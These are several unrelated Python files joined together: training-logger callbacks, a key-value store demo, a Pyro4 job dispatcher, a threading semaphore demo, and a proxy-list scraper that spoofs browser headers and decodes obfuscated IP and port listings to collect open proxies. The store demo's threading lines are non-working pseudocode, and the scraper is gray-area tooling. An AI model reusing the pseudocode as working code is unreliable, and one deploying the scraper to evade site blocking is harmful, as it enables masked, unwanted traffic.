        csv_path = self.save_dir / 'results.csv'
        ncols = len(metrics) + 1  # +1 for the leading epoch column
        # Emit the header only when the file is created.
        header = '' if csv_path.exists() else (('%20s,' * ncols % tuple(['epoch'] + self.keys)).rstrip(',') + '\n')
        row = ('%20.5g,' * ncols % tuple([epoch] + vals)).rstrip(',') + '\n'
        with open(csv_path, 'a') as fh:
            fh.write(header + row)
    if self.tb:
        for tag, value in metrics.items():
            self.tb.add_scalar(tag, value, epoch)
    if self.wandb:
        if best_fitness == fi:
            best_results = [epoch] + vals[3:7]
            for i, name in enumerate(self.best_keys):
                self.wandb.wandb_run.summary[name] = best_results[i]  # log best results in the summary
        self.wandb.log(metrics)
        self.wandb.end_epoch(best_result=best_fitness == fi)
def on_model_save(self, last, epoch, final_epoch, best_fitness, fi):
    """Upload the latest checkpoint to W&B every `save_period` epochs (skipped on the final epoch)."""
    if not self.wandb:
        return
    period = self.opt.save_period
    if period != -1 and (epoch + 1) % period == 0 and not final_epoch:
        self.wandb.log_model(last.parent, self.opt, epoch, fi, best_model=best_fitness == fi)
def on_train_end(self, last, best, plots, epoch, results):
    """Final bookkeeping on training end: render result plots and push them,
    plus the best checkpoint, to TensorBoard / W&B."""
    if plots:
        plot_results(file=self.save_dir / 'results.csv')  # save results.png
    candidates = ['results.png', 'confusion_matrix.png']
    candidates += [f'{x}_curve.png' for x in ('F1', 'PR', 'P', 'R')]
    files = [self.save_dir / name for name in candidates if (self.save_dir / name).exists()]
    if self.tb:
        import cv2
        for f in files:
            # cv2 loads BGR; reverse the channel axis to get RGB for TensorBoard.
            self.tb.add_image(f.stem, cv2.imread(str(f))[..., ::-1], epoch, dataformats='HWC')
    if self.wandb:
        self.wandb.log(dict(zip(self.keys[3:10], results)))  # log best.pt val results
        self.wandb.log({"Results": [wandb.Image(str(f), caption=f.name) for f in files]})
        # Calling wandb.log. TODO: Refactor this into WandbLogger.log_model
        if not self.opt.evolve:
            wandb.log_artifact(str(best if best.exists() else last), type='model',
                               name='run_' + self.wandb.wandb_run.id + '_model',
                               aliases=['latest', 'best', 'stripped'])
        self.wandb.finish_run()
def on_params_update(self, params):
    """Merge updated hyperparameters or configs into the W&B run.

    params: dict of {param: value} pairs.
    """
    if not self.wandb:
        return
    self.wandb.wandb_run.config.update(params, allow_val_change=True)
|
# Demonstration script: how to access and perform operations on the main file.
# Run the MODULE of the MAIN FILE and import it as a library.
import code as x
# Import the main file ("code" is the file name used here) as a library.
# NOTE(review): this shadows the stdlib `code` module -- assumes a local code.py; confirm.
x.create("sastra",25)
# Create a key with the given key_name and value, with no time-to-live property.
x.create("src",70,3600)
# Create a key with key_name, value and a time-to-live value (number of seconds).
x.read("sastra")
# Returns the value of the key in JSON-object format: 'key_name:value'.
x.read("src")
# Returns the value in JSON-object format if the TIME-TO-LIVE HAS NOT EXPIRED, else returns an ERROR.
x.create("sastra",50)
# Returns an ERROR since the key_name already exists in the database.
# To overcome this error:
#   - either use the modify operation to change the value of a key,
#   - or use the delete operation and recreate it.
x.modify("sastra",55)
# Replaces the initial value of the key with the new value.
x.delete("sastra")
# Deletes the key and its value from the database (memory is also freed).
# We can access these using multiple threads, for example:
# NOTE(review): the lines below are pseudocode -- `Thread` is never imported,
# `(create or read or delete)` is a placeholder for one callable, and
# Thread objects have no sleep() method; treat as illustrative only.
t1=Thread(target=(create or read or delete),args=(key_name,value,timeout)) #as per the operation
t1.start()
t1.sleep()
t2=Thread(target=(create or read or delete),args=(key_name,value,timeout)) #as per the operation
t2.start()
t2.sleep()
# ...and so on up to tn.
# The code also returns other errors, such as:
#   "invalidkey" if key length is greater than 32 or key_name contains numeric/special characters, etc.
#   "key does not exist" if the key_name was misspelled or deleted earlier
#   "File memory limit reached" if the file memory exceeds 1GB
|
dispatcher.py | # This file is adapted from github repo: https://github.com/automl/HpBandSter.
import time
import Pyro4
import queue
import logging
import threading
class Job(object):
    """Container for one unit of work plus its lifecycle metadata
    (timestamps, result, exception, and the worker that ran it)."""

    def __init__(self, id, **kwargs):
        self.id = id                  # caller-supplied job identifier
        self.kwargs = kwargs          # arguments forwarded to the worker
        self.timestamps = {}          # event name -> wall-clock time
        self.result = None            # filled in by register_result
        self.exception = None         # filled in by register_result
        self.worker_name = None       # worker the job was dispatched to

    def time_it(self, which_time):
        """Record the current wall-clock time under the given event name."""
        self.timestamps[which_time] = time.time()

    def __repr__(self):
        parts = ("job_id: " + str(self.id),
                 "kwargs: " + str(self.kwargs),
                 "result: " + str(self.result),
                 "exception: " + str(self.exception))
        return "\n".join(parts) + "\n"
class Worker(object):
    """Handle for a remote Pyro4 worker: wraps the proxy plus the id of the
    job it is currently running (None when idle)."""

    def __init__(self, name, uri):
        self.name = name                # nameserver-registered worker name
        self.proxy = Pyro4.Proxy(uri)   # remote proxy used for all calls
        self.runs_job = None            # id of the job currently running

    def is_alive(self):
        """Return True when the Pyro connection can be (re-)established;
        any error other than a closed connection propagates."""
        try:
            self.proxy._pyroReconnect(1)
            return True
        except Pyro4.errors.ConnectionClosedError:
            return False

    def shutdown(self):
        """Ask the remote worker to shut itself down."""
        self.proxy.shutdown()

    def is_busy(self):
        """Ask the remote worker whether it is currently computing."""
        return self.proxy.is_busy()

    def __repr__(self):
        return self.name
class Dispatcher(object):
    """
    The dispatcher is responsible for assigning tasks to free workers, report results back to the master and
    communicate to the nameserver.

    Threading model: two background threads (`discover_workers`, `job_runner`) plus the
    Pyro daemon loop share state guarded by a single lock, exposed through two condition
    variables (`discover_cond`, `runner_cond`) built on that same lock.
    """
    def __init__(self, new_result_callback, run_id='0', ping_interval=10, nameserver='localhost', nameserver_port=None,
                 host=None, logger=None, queue_callback=None):
        """
        Parameters
        ----------
        new_result_callback: function
            function that will be called with a `Job instance <hpbandster.core.dispatcher.Job>`_ as argument.
            From the `Job` the result can be read and e.g. logged.
        run_id: str
            unique run_id associated with the HPB run
        ping_interval: int
            how often to ping for workers (in seconds)
        nameserver: str
            address of the Pyro4 nameserver
        nameserver_port: int
            port of Pyro4 nameserver
        host: str
            ip (or name that resolves to that) of the network interface to use
        logger: logging.Logger
            logger-instance for info and debug
        queue_callback: function
            gets called with the number of workers in the pool on every update-cycle
        """
        self.new_result_callback = new_result_callback
        self.queue_callback = queue_callback
        self.run_id = run_id
        self.nameserver = nameserver
        self.nameserver_port = nameserver_port
        self.host = host
        self.ping_interval = int(ping_interval)
        self.shutdown_all_threads = False
        if logger is None:
            self.logger = logging.getLogger('[Lite-BO] dispatcher')
        else:
            self.logger = logger
        self.logger.setLevel(logging.DEBUG)
        self.worker_pool = {}                    # name -> Worker, all known live workers
        self.waiting_jobs = queue.Queue()        # jobs submitted but not yet dispatched
        self.running_jobs = {}                   # job id -> Job, currently executing
        self.history_jobs = list()               # finished Jobs, in completion order
        self.idle_workers = set()                # names of workers ready for a job
        # Both conditions share ONE lock so the runner and the discovery thread
        # can never mutate the pools concurrently.
        self.thread_lock = threading.Lock()
        self.runner_cond = threading.Condition(self.thread_lock)
        self.discover_cond = threading.Condition(self.thread_lock)
        # NOTE(review): dispatcher id uses 'litebo.' while worker discovery below
        # uses the prefix 'lite-bo.' -- confirm the naming mismatch is intentional.
        self.pyro_id = "litebo.run_%s.dispatcher" % self.run_id

    def run(self):
        """Start the helper threads and serve Pyro requests until shutdown."""
        with self.discover_cond:
            t1 = threading.Thread(target=self.discover_workers, name='discover_workers')
            t1.start()
            self.logger.info('DISPATCHER: started the \'discover_worker\' thread')
            t2 = threading.Thread(target=self.job_runner, name='job_runner')
            t2.start()
            self.logger.info('DISPATCHER: started the \'job_runner\' thread')
            self.pyro_daemon = Pyro4.core.Daemon(host=self.host)
            with Pyro4.locateNS(host=self.nameserver, port=self.nameserver_port) as ns:
                uri = self.pyro_daemon.register(self, self.pyro_id)
                ns.register(self.pyro_id, uri)
        self.logger.info("DISPATCHER: Pyro daemon running on %s" % self.pyro_daemon.locationStr)
        # Blocks here until self.pyro_daemon.shutdown() is called (see shutdown()).
        self.pyro_daemon.requestLoop()
        with self.discover_cond:
            self.shutdown_all_threads = True
            self.logger.info('DISPATCHER: Dispatcher shutting down')
            # Wake both helper threads so they observe shutdown_all_threads.
            self.runner_cond.notify_all()
            self.discover_cond.notify_all()
        with Pyro4.locateNS(host=self.nameserver, port=self.nameserver_port) as ns:
            ns.remove(self.pyro_id)
        t1.join()
        self.logger.debug('DISPATCHER: \'discover_worker\' thread exited')
        t2.join()
        self.logger.debug('DISPATCHER: \'job_runner\' thread exited')
        self.logger.info('DISPATCHER: shut down complete')

    def shutdown_all_workers(self, rediscover=False):
        """Tell every pooled worker to shut down; optionally trigger a re-discovery."""
        with self.discover_cond:
            for worker in self.worker_pool.values():
                worker.shutdown()
            if rediscover:
                time.sleep(1)
                self.discover_cond.notify()

    def shutdown(self, shutdown_workers=False):
        """Stop the Pyro daemon (ends run()); optionally shut workers down first."""
        if shutdown_workers:
            self.shutdown_all_workers()
        with self.runner_cond:
            self.pyro_daemon.shutdown()

    @Pyro4.expose
    @Pyro4.oneway
    def trigger_discover_worker(self):
        # Remote-callable: a newly started worker pings us to force a discovery pass.
        self.logger.info("DISPATCHER: A new worker triggered discover_worker")
        with self.discover_cond:
            self.discover_cond.notify()

    def discover_workers(self):
        """Background loop: poll the nameserver every ping_interval seconds,
        add new workers, drop dead ones, and reschedule their crashed jobs."""
        self.discover_cond.acquire()
        sleep_interval = 1  # NOTE(review): appears unused -- confirm before removing
        while True:
            self.logger.debug('DISPATCHER: Starting worker discovery**************************************************')
            update = False
            with Pyro4.locateNS(host=self.nameserver, port=self.nameserver_port) as ns:
                worker_names = ns.list(prefix="lite-bo.run_%s.worker." % self.run_id)
                self.logger.debug("DISPATCHER: Found %i potential workers, %i currently in the pool."%(len(worker_names), len(self.worker_pool)))
            # Add workers that registered since the last pass (skip unreachable ones).
            for wn, uri in worker_names.items():
                if wn not in self.worker_pool:
                    w = Worker(wn, uri)
                    if not w.is_alive():
                        self.logger.debug('DISPATCHER: skipping dead worker, %s' % wn)
                        continue
                    update = True
                    self.logger.info('DISPATCHER: discovered new worker, %s' % wn)
                    self.worker_pool[wn] = w
            # check the current list of workers
            crashed_jobs = set()
            all_workers = list(self.worker_pool.keys())
            for wn in all_workers:
                # remove dead entries from the nameserver
                if not self.worker_pool[wn].is_alive():
                    self.logger.info('DISPATCHER: removing dead worker, %s' % wn)
                    update = True
                    # todo check if there were jobs running on that that need to be rescheduled
                    current_job = self.worker_pool[wn].runs_job
                    if not current_job is None:
                        self.logger.info('Job %s was not completed' % str(current_job))
                        crashed_jobs.add(current_job)
                    del self.worker_pool[wn]
                    self.idle_workers.discard(wn)
                    continue
                if not self.worker_pool[wn].is_busy():
                    self.idle_workers.add(wn)
            # try to submit more jobs if something changed
            if update:
                if not self.queue_callback is None:
                    # Release the shared lock around the user callback to avoid deadlock.
                    self.discover_cond.release()
                    self.queue_callback(len(self.worker_pool))
                    self.discover_cond.acquire()
                self.runner_cond.notify()
            for crashed_job in crashed_jobs:
                # register_result re-acquires the lock itself, so release first.
                self.discover_cond.release()
                self.register_result(crashed_job, {'result': None, 'exception': 'Worker died unexpectedly.'})
                self.discover_cond.acquire()
            self.logger.debug('DISPATCHER: Finished worker discovery')
            # Sleep until the next ping, a trigger_discover_worker() call, or shutdown.
            self.discover_cond.wait(self.ping_interval)
            if self.shutdown_all_threads:
                self.logger.debug('DISPATCHER: discover_workers shutting down')
                self.runner_cond.notify()
                self.discover_cond.release()
                return

    def number_of_workers(self):
        """Return the current size of the worker pool (thread-safe)."""
        with self.discover_cond:
            return len(self.worker_pool)

    def job_runner(self):
        """Background loop: pair each waiting job with an idle worker and
        dispatch it over Pyro."""
        self.runner_cond.acquire()
        while True:
            # Wait until there is both a job to run and a worker to run it on.
            while self.waiting_jobs.empty() or len(self.idle_workers) == 0:
                self.logger.debug('DISPATCHER: jobs to submit = %i, number of idle workers = %i -> waiting!'%(self.waiting_jobs.qsize(), len(self.idle_workers) ))
                self.runner_cond.wait()
                self.logger.debug('DISPATCHER: Trying to submit another job.')
                if self.shutdown_all_threads:
                    self.logger.debug('DISPATCHER: job_runner shutting down')
                    self.discover_cond.notify()
                    self.runner_cond.release()
                    return
            job = self.waiting_jobs.get()
            wn = self.idle_workers.pop()
            worker = self.worker_pool[wn]
            self.logger.info('DISPATCHER: starting job %s on %s' % (str(job.id), worker.name))
            job.time_it('started')
            worker.runs_job = job.id
            # start_computation is a remote call; the worker reports back via register_result.
            worker.proxy.start_computation(self, job.id, **job.kwargs)
            job.worker_name = wn
            self.running_jobs[job.id] = job
            self.logger.info('DISPATCHER: job %s dispatched on %s' % (str(job.id), worker.name))

    def submit_job(self, id, **kwargs):
        """Queue a new job (identified by `id`) and wake the job_runner thread."""
        self.logger.info('DISPATCHER: trying to submit job %s' % str(id))
        with self.runner_cond:
            job = Job(id, **kwargs)
            job.time_it('submitted')
            self.waiting_jobs.put(job)
            self.logger.info('DISPATCHER: trying to notify the job_runner thread.')
            self.runner_cond.notify()

    @Pyro4.expose
    @Pyro4.callback
    @Pyro4.oneway
    def register_result(self, id=None, result=None):
        """Remote-callable: record a finished job's result/exception, return its
        worker to the idle pool, and invoke the user's result callback."""
        self.logger.debug('DISPATCHER: job %s finished'%(str(id)))
        with self.runner_cond:
            self.logger.debug('DISPATCHER: register_result: lock acquired')
            # fill in missing information
            job = self.running_jobs[id]
            job.time_it('finished')
            job.result = result['result']
            job.exception = result['exception']
            self.logger.debug('DISPATCHER: job %s on %s finished' % (str(job.id), job.worker_name))
            self.logger.debug(str(job))
            # delete job
            del self.running_jobs[id]
            self.history_jobs.append(job)
            # label worker as idle again
            try:
                self.worker_pool[job.worker_name].runs_job = None
                self.worker_pool[job.worker_name].proxy._pyroRelease()
                self.idle_workers.add(job.worker_name)
                # notify the job_runner to check for more jobs to run
                self.runner_cond.notify()
            except KeyError:
                # happens for crashed workers, but we can just continue
                pass
            except:
                raise
        # call users callback function to register the result
        # needs to be with the condition released, as the master can call
        # submit_job quickly enough to cause a dead-lock
        self.new_result_callback(job)
|
sem.py | #! /usr/bin/env python
# -*- coding:UTF-8 -*-
# 使用信号量机制,注意semaphore的使用
# sem可以管理某一类资源的一组实例
# 其实使用queue队列模块是最佳的
import threading
import time
import random
def numbergen(sem, queue, qlock):
    # Producer thread: every 2 seconds, with 50% probability, append a random
    # number to the shared queue and release the semaphore to signal consumers.
    while True:
        time.sleep(2)
        if random.randint(0,1):
            value = random.randint(1,100)
            qlock.acquire()  # second gate: exclusive access to the queue
            try:
                queue.append(value)
            finally:
                qlock.release()
            print "Placed %d on the queue." % value
            sem.release()  # first gate: tells consumers data is available (not necessarily processed immediately)
def numbercal(sem, queue, qlock):
    # Consumer thread: block on the semaphore until a value is available,
    # then pop it from the shared queue under the lock and "process" it.
    while True:
        sem.acquire()    # wait for the producer's signal
        qlock.acquire()  # exclusive access to the queue while popping
        try:
            value = queue.pop(0)
        finally:
            qlock.release()
        print "%s: Got %d from the queue."%\
            (threading.currentThread().getName(),value)
        newvalue = value * 2  # simulated processing of the value
        time.sleep(3)
# Main thread: shared state is passed to the worker threads as arguments.
childthreads = []
sem = threading.Semaphore(0)  # counts available items; starts empty
queue = []                    # shared work queue (a plain list)
qlock = threading.Lock()      # guards queue mutation
# Create the producer thread.
t = threading.Thread(target = numbergen, args = [sem, queue, qlock])
t.setDaemon(True)
t.start()
childthreads.append(t)
# Create the consumer threads.
for i in range(1,3):
    t = threading.Thread(target = numbercal, args= [sem,queue, qlock])
    t.setDaemon(True)
    t.start()
    childthreads.append(t)
while True: # run forever; daemon threads die with the main thread
    time.sleep(300)
|
proxy-scraper.py | ######################################################################
################ http://scrapeomatic.blogspot.com/ ###################
######################################################################
##################### Proxy Scraper Script V1.2 ######################
######################################################################
######################################################################
###################### http://proxy-list.org #########################
##################### http://www.us-proxy.org ########################
#################### http://free-proxy-list.net ######################
#################### http://www.cool-proxy.net #######################
####################### http://www.samair.ru #########################
#################### http://www.proxylisty.com #######################
######################## http://nntime.com ###########################
#################### http://www.aliveproxy.com #######################
######################################################################
import urllib, urllib2
import time, datetime
import threading, Queue
import re
import StringIO, gzip
import sys
######################################################################
############################ Settings ################################
######################################################################
debug = False
######################################################################
######################################################################
def bug(line):
if debug == True:
print "Debug:: " + line
def queueThread():
    # Drain the shared workerQueue into a timestamped proxylist-*.txt file,
    # incrementing the global proxyCount for every proxy written.
    global proxyCount
    ts = time.time()
    dt = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d-%H-%M-%S')
    print "Saving to proxylist-" + dt + ".txt"
    fout = open("proxylist-" + dt + ".txt", "w")
    while not workerQueue.empty():
        fout.write(workerQueue.get() + "\n")
        proxyCount+=1
    fout.close()
def proxylist():
    # Scrape proxies from the first 10 paginated listing pages of proxy-list.org
    # and push each matched entry onto the shared workerQueue.
    # NOTE(review): the Host header below is 'www.proxylisty.com' in every scraper
    # in this file regardless of the target site -- looks copy-pasted; confirm.
    print "Grabbing: http://proxy-list.org/"
    primary_url = "http://proxy-list.org/english/index.php?p="
    urls = []
    for i in range(1, 11):
        urls.append(primary_url + str(i))
    for url in urls:
        try:
            bug("grabbing " + "'" + url + "'")
            opener = urllib2.build_opener()
            # Browser-like headers to avoid trivial bot blocking.
            opener.addheaders = [('Host', 'www.proxylisty.com'),
                                 ('Connection', 'keep-alive'),
                                 ('Cache-Control', 'max-age=0'),
                                 ('Accept','text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'),
                                 ('Upgrade-Insecure-Requests', '1'),
                                 ('User-agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36'),
                                 ('Referer', 'https://www.google.co.za/'),
                                 ('Accept-Encoding','gzip, deflate, sdch'),
                                 ('Accept-Language','en-US,en;q=0.8')]
            response = opener.open(url, timeout=10)
            # The response body is gzip-compressed; decompress via StringIO + GzipFile.
            compressedFile = StringIO.StringIO()
            compressedFile.write(response.read())
            compressedFile.seek(0)
            decompessedFile = gzip.GzipFile(fileobj=compressedFile, mode='rb')
            html = decompessedFile.read()
            templs = re.findall(r'<li class="proxy">([1-99999].*)?</li>', html)
            for line in templs:
                workerQueue.put(line)
                bug("proxylist() " + line)
        except Exception, e:
            # Best-effort scrape: any failure for one page is logged and skipped.
            if e.message == " ":
                bug(e.message)
                bug("Failed to grab " + "'" + url + "'")
            else:
                bug("Failed to grab " + "'" + url + "'")
def usproxy():
    # Scrape IP:port pairs from the single-page list at us-proxy.org and
    # push them onto the shared workerQueue.
    print "Grabbing: http://www.us-proxy.org/"
    templs = []
    url = "http://www.us-proxy.org/"
    try:
        bug("grabbing " + "'" + url + "'")
        opener = urllib2.build_opener()
        opener.addheaders = [('Host', 'www.proxylisty.com'),
                             ('Connection', 'keep-alive'),
                             ('Cache-Control', 'max-age=0'),
                             ('Accept','text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'),
                             ('Upgrade-Insecure-Requests', '1'),
                             ('User-agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36'),
                             ('Referer', 'https://www.google.co.za/'),
                             ('Accept-Encoding','gzip, deflate, sdch'),
                             ('Accept-Language','en-US,en;q=0.8')]
        response = opener.open(url, timeout=10)
        html = response.read()
        # First pattern captures the IPs, second captures the matching ports.
        templs = re.findall(r'<tr><td>(.*?)</td><td>', html)
        templs2 = re.findall(r'</td><td>[1-99999].*?</td><td>', html)
        for i in range(len(templs)):
            temp = templs[i] + ":" + templs2[i].replace('</td><td>', '')
            workerQueue.put(temp)
            bug("usproxy() " + templs[i] + ":" + templs2[i].replace('</td><td>', ''))
    except Exception, e:
        # Best-effort scrape: failures are only logged in debug mode.
        if e.message == " ":
            bug(e.message)
            bug("Failed to grab " + "'" + url + "'")
        else:
            bug("Failed to grab " + "'" + url + "'")
def freeproxylist():
    # Scrape IP:port pairs from the single-page list at free-proxy-list.net
    # and push them onto the shared workerQueue.
    print "Grabbing: http://free-proxy-list.net/"
    url = "http://free-proxy-list.net/"
    try:
        bug("grabbing " + "'" + url + "'")
        opener = urllib2.build_opener()
        opener.addheaders = [('Host', 'www.proxylisty.com'),
                             ('Connection', 'keep-alive'),
                             ('Cache-Control', 'max-age=0'),
                             ('Accept','text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'),
                             ('Upgrade-Insecure-Requests', '1'),
                             ('User-agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36'),
                             ('Referer', 'https://www.google.co.za/'),
                             ('Accept-Encoding','gzip, deflate, sdch'),
                             ('Accept-Language','en-US,en;q=0.8')]
        response = opener.open(url, timeout=10)
        html = response.read()
        # First pattern captures the IPs, second captures the matching ports.
        templs = re.findall(r'<tr><td>(.*?)</td><td>', html)
        templs2 = re.findall(r'</td><td>[1-99999].*?</td><td>', html)
        for i in range(len(templs)):
            workerQueue.put(templs[i] + ":" + templs2[i].replace('</td><td>', ''))
            bug("freeproxylist() " + templs[i] + ":" + templs2[i].replace('</td><td>', ''))
    except Exception, e:
        # Best-effort scrape: failures are only logged in debug mode.
        if e.message == " ":
            bug(e.message)
            bug("Failed to grab " + "'" + url + "'")
        else:
            bug("Failed to grab " + "'" + url + "'")
def coolproxy():
    # Scrape proxies from 12 score-sorted pages of cool-proxy.net. The site
    # obfuscates IPs with rot13 + base64; ports are plain table cells.
    print "Grabbing: http://www.cool-proxy.net/"
    primary_url = "http://www.cool-proxy.net/proxies/http_proxy_list/sort:score/direction:desc/page:"
    urls = []
    for i in range(1, 13):
        urls.append(primary_url + str(i))
    for url in urls:
        bug("grabbing " + "'" + url + "'")
        try:
            opener = urllib2.build_opener()
            opener.addheaders = [('Host', 'www.proxylisty.com'),
                                 ('Connection', 'keep-alive'),
                                 ('Cache-Control', 'max-age=0'),
                                 ('Accept','text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'),
                                 ('Upgrade-Insecure-Requests', '1'),
                                 ('User-agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36'),
                                 ('Referer', 'https://www.google.co.za/'),
                                 ('Accept-Encoding','gzip, deflate, sdch'),
                                 ('Accept-Language','en-US,en;q=0.8')]
            response = opener.open(url, timeout=10)
            # The response body is gzip-compressed; decompress via StringIO + GzipFile.
            compressedFile = StringIO.StringIO()
            compressedFile.write(response.read())
            compressedFile.seek(0)
            decompessedFile = gzip.GzipFile(fileobj=compressedFile, mode='rb')
            html = decompessedFile.read()
            templs = re.findall(r'str_rot13(.*?)</script>', html)
            templs2 = re.findall(r'<td>[1-99999].*?</td>', html)
            for i in range(len(templs)):
                temp = templs[i].replace('("', '')#remove front of string
                temp = temp.replace('")))', '')#remove back of string
                temp = temp.decode('rot13').decode('base64')#decode from rot13 then from base64
                workerQueue.put(temp + templs2[i].replace('<td>', ':').replace('</td>', ''))
                bug("coolproxy() " + temp + templs2[i].replace('<td>', ':').replace('</td>', ''))
        except Exception, e:
            # Best-effort scrape: failures are only logged in debug mode.
            if e.message == " ":
                bug(e.message)
                bug("Failed to grab " + "'" + url + "'")
            else:
                bug("Failed to grab " + "'" + url + "'")
def samair():
    # Scrape proxies from 30 numbered pages (proxy-01.htm .. proxy-30.htm)
    # at samair.ru and push "ip:port" entries onto the shared workerQueue.
    print "Grabbing: http://www.samair.ru/"
    primary_url = "http://www.samair.ru/proxy/proxy-00.htm"
    urls = []
    for i in range(1, 31):
        # Page numbers are zero-padded to two digits in the URL template.
        if i < 10:
            urls.append(primary_url.replace("00", "0" + str(i)))
        else:
            urls.append(primary_url.replace("00", str(i)))
    for url in urls:
        try:
            bug("grabbing " + "'" + url + "'")
            opener = urllib2.build_opener()
            opener.addheaders = [('Host', 'www.proxylisty.com'),
                                 ('Connection', 'keep-alive'),
                                 ('Cache-Control', 'max-age=0'),
                                 ('Accept','text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'),
                                 ('Upgrade-Insecure-Requests', '1'),
                                 ('User-agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36'),
                                 ('Referer', 'https://www.google.co.za/'),
                                 ('Accept-Encoding','gzip, deflate, sdch'),
                                 ('Accept-Language','en-US,en;q=0.8')]
            response = opener.open(url, timeout=10)
            # The response body is gzip-compressed; decompress via StringIO + GzipFile.
            compressedFile = StringIO.StringIO()
            compressedFile.write(response.read())
            compressedFile.seek(0)
            decompessedFile = gzip.GzipFile(fileobj=compressedFile, mode='rb')
            html = decompessedFile.read()
            links = re.findall(r'<tr><td>(.*?):(.*?)</td><td>', html)
            for link in links:
                workerQueue.put(link[0] + ":" + link[1])
                bug("samair() " + link[0] + ":" + link[1])
        except Exception, e:
            # Best-effort scrape: failures are only logged in debug mode.
            if e.message == " ":
                bug(e.message)
                bug("Failed to grab " + "'" + url + "'")
            else:
                bug("Failed to grab " + "'" + url + "'")
def proxylisty():
    # Scrape proxies from 67 paginated pages of proxylisty.com; ports are
    # extracted from the per-port link URLs rather than table cells.
    print "Grabbing: http://www.proxylisty.com/"
    primary_url = "http://www.proxylisty.com/ip-proxylist-"
    urls = []
    for i in range(1, 68):
        urls.append(primary_url + str(i))
    for url in urls:
        try:
            bug("grabbing " + "'" + url + "'")
            opener = urllib2.build_opener()
            opener.addheaders = [('Host', 'www.proxylisty.com'),
                                 ('Connection', 'keep-alive'),
                                 ('Cache-Control', 'max-age=0'),
                                 ('Accept','text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'),
                                 ('Upgrade-Insecure-Requests', '1'),
                                 ('User-agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36'),
                                 ('Referer', 'https://www.google.co.za/'),
                                 ('Accept-Encoding','gzip, deflate, sdch'),
                                 ('Accept-Language','en-US,en;q=0.8')]
            response = opener.open(url, timeout=10)
            # The response body is gzip-compressed; decompress via StringIO + GzipFile.
            compressedFile = StringIO.StringIO()
            compressedFile.write(response.read())
            compressedFile.seek(0)
            decompessedFile = gzip.GzipFile(fileobj=compressedFile, mode='rb')
            html = decompessedFile.read()
            templs = re.findall(r'<tr>\n<td>(.*?)</td>', html)
            templs2 = re.findall(r'com/port/(.*?)-ip-list', html)
            for i in range(len(templs)):
                workerQueue.put(templs[i] + ":" + templs2[i])
                bug("proxylisty() " + templs[i] + ":" + templs2[i])
        except Exception, e:
            # Best-effort scrape: failures are only logged in debug mode.
            if e.message == " ":
                bug(e.message)
                bug("Failed to grab " + "'" + url + "'")
            else:
                bug("Failed to grab " + "'" + url + "'")
def nntime():
    # Scrape proxies from 30 numbered pages at nntime.com. Ports are obfuscated
    # by an inline JavaScript substitution table (var=digit assignments), which
    # is parsed into decoder_dict and used to reassemble each port.
    print "Grabbing: http://nntime.com/"
    primary_url = "http://nntime.com/proxy-list-00.htm"
    urls = []
    for i in range(1, 31):
        # Page numbers are zero-padded to two digits in the URL template.
        if i < 10:
            urls.append(primary_url.replace("00", "0" + str(i)))
        else:
            urls.append(primary_url.replace("00", str(i)))
    for url in urls:
        try:
            response = urllib.urlopen(url)
            html = response.read()
            # Build the variable->digit decoding table from the page's script block.
            decoder_string = re.findall(r'<script type="text/javascript">\n(.*?)</script>', html)
            decoderls = decoder_string[0].split(";")
            temp_tuple = []
            for itm in decoderls:
                if itm:
                    temp_tuple.append((itm.split("=")))
            decoder_dict = dict(temp_tuple)
            ips = re.findall(r'></td><td>(.*?)<script type="text/javascript">document', html)
            ports = []
            templs = re.findall(r'<script type="text/javascript">.*?</script>', html)
            for line in templs:
                # Strip the document.write wrapper, leaving "a+b+c" variable names.
                temp = line.replace('<script type="text/javascript">document.write(":"+', '')
                temp = temp.replace(')</script>', '')
                codes = temp.split("+")
                temp_port = ""
                for code in codes:
                    temp_port += decoder_dict[code]
                ports.append(temp_port)
            for i in range(len(ips)):
                #print ips[i] + ":" + ports[i]
                workerQueue.put(ips[i] + ":" + ports[i])
        except Exception, e:
            # Best-effort scrape: failures are only logged in debug mode.
            if e.message == " ":
                bug(e.message)
                bug("Failed to grab " + "'" + url + "'")
            else:
                bug("Failed to grab " + "'" + url + "'")
def aliveproxy():
    # Scrape aliveproxy.com: collect per-country list links from the front page
    # (up to the "Socks 5" section), then pull ip:port pairs from each list.
    print "Grabbing: http://www.aliveproxy.com/"
    urls = []
    url = "http://www.aliveproxy.com/"
    response = urllib.urlopen(url)
    html = response.read()
    # Ignore everything from the "Socks 5" section onwards (HTTP proxies only).
    pos = html.find("Socks 5")
    html = html[:pos]
    temp_urls = re.findall(r'href=[\'"]?([^\'" >]+)', html)
    for itm in temp_urls:
        if "http://www.aliveproxy.com/proxy-list/proxies.aspx/" in itm:
            urls.append(itm)
    for url in urls:
        response = urllib.urlopen(url)
        html = response.read()
        # Match literal ip:port pairs anywhere in the page.
        templs = re.findall(r'(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}):(\d{1,5})', html)
        for itm in templs:
            workerQueue.put(itm[0] + ":" + itm[1])
if __name__ == "__main__":
    # Entry point: run every scraper in its own daemon thread (staggered by
    # 0.5s), wait for all of them, then drain the queue to a timestamped file.
    print "#######################################"
    print "#######################################"
    print "###### Proxy Scraper Script V1.2 ######"
    print "## http://scrapeomatic.blogspot.com/ ##"
    print "#######################################"
    print "#######################################\n"
    print "Starting Proxy Scraper...\n"
    proxyCount = 0
